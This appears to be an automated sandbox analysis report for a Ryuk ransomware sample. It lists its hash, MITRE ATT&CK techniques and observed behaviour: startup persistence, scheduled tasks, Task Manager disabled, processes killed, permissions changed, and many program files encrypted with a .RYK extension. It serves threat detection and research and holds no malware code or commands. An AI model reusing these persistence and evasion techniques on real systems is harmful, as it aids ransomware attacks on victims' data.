Malware Analysis Report

2024-08-06 09:28

Sample ID 220921-zbzzrscfcl
Target ryuk.exe
SHA256 5fce1d810a5e1c7536496c1b73eff77c9c3d92ac41f86959a1be5349663403ae
Tags
ryuk discovery evasion ransomware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5fce1d810a5e1c7536496c1b73eff77c9c3d92ac41f86959a1be5349663403ae

Threat Level: Known bad

The file ryuk.exe was found to be: Known bad.

Malicious Activity Summary

ryuk discovery evasion ransomware

Ryuk

Disables Task Manager via registry modification

Modifies file permissions

Drops startup file

Enumerates connected drives

Drops file in Program Files directory

Enumerates physical storage devices

Creates scheduled task(s)

Views/modifies file attributes

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Kills process with taskkill

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK Matrix V6

Initial Access
TA0001
Execution
TA0002
Scheduled Task
T1053
Persistence
TA0003
Scheduled Task
T1053
Hidden Files and Directories
T1158
Privilege Escalation
TA0004
Scheduled Task
T1053
Defense Evasion
TA0005
File Permissions Modification
T1222
Hidden Files and Directories
T1158
Credential Access
TA0006
Discovery
TA0007
Query Registry
T1012
Peripheral Device Discovery
T1120
System Information Discovery
T1082
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040

Analysis: static1

Detonation Overview

Reported

2022-09-21 20:33

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-09-21 20:33

Reported

2022-09-21 20:36

Platform

win10v2004-20220812-en

Max time kernel

112s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ryuk.exe"

Signatures

Ryuk

ransomware ryuk

Disables Task Manager via registry modification

evasion

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\attrib.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Standard2019R_Retail-ul-oob.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.scale-140.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\AccessR_Retail-ul-phn.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\WINWORD.VisualElementsManifest.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Templates\1033\ApothecaryLetter.dotx.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\da-dk\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\cloud_secured.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sl-sl\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-swing-tabcontrol.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-ui_zh_CN.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019R_OEM_Perp-ul-phn.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_equalizer.html.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\css\main-selector.css.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\toc.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\GRLEX.DLL.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\vlc.mo.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.contrast-black_scale-140.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\ADALPREVIOUS.DLL.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.sat4j.pb_2.3.5.v201404071733.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-favorites.xml_hidden.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest3-ppd.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_Trial2-ppd.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_zh_4.4.0.v20140623020002.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial3-ppd.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN105.XML.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\themes\dark\adc_logo.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\km.pak.DATA.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\about.html.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\ClientARMRefer2019_eula.txt.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themes\dark\help.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql_2.0.100.v20131211-1531.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_MAK_AE-ppd.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.scale-100.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\rhp_world_icon_2x.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-selector-api.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019R_Retail-ppd.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\GRPHFLT\MS.WPG.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner_int_2x.gif.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\asl-v20.txt.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jmx.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\DocumentRepository.ico.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-ja_jp.gif.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\mr.pak.DATA.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_Retail-ul-phn.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.scale-100.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected].[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\selector.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fr-fr\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sv-se\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\AccessR_Grace-ul-oob.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019R_OEM_Perp-ppd.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Power Map Excel Add-in\VISUALIZATIONDIRECTX.DLL.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\hu-hu\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\rhp_world_icon_2x.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fr-fr\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\de_get.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\ga.pak.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\core\locale\com-sun-tools-visualvm-modules-startup_ja.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PROOF\MSSP7EN.dub.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\URLREDIR.DLL.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\vlc.mo.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\vlc.mo.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4824 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 3064 wrote to memory of 3600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3064 wrote to memory of 3600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4824 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 4112 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 4112 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 4112 wrote to memory of 4192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4112 wrote to memory of 4192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4824 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 1672 wrote to memory of 1128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1672 wrote to memory of 1128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4824 wrote to memory of 3596 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 3596 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 3596 wrote to memory of 4528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3596 wrote to memory of 4528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4824 wrote to memory of 628 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 628 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 628 wrote to memory of 3568 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 628 wrote to memory of 3568 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4824 wrote to memory of 1148 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 1148 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 1148 wrote to memory of 2372 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1148 wrote to memory of 2372 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4824 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 2768 wrote to memory of 2324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2768 wrote to memory of 2324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4824 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 4532 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 4532 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 4352 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 4352 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4532 wrote to memory of 1472 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4532 wrote to memory of 1472 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4824 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 228 wrote to memory of 1556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 228 wrote to memory of 1556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 228 wrote to memory of 3884 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 228 wrote to memory of 3884 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4824 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 1124 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 1124 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 4352 wrote to memory of 388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
